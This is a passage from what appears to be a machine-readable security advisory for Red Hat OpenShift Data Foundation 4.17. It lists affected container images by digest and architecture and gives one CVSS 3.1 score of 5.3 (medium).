"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
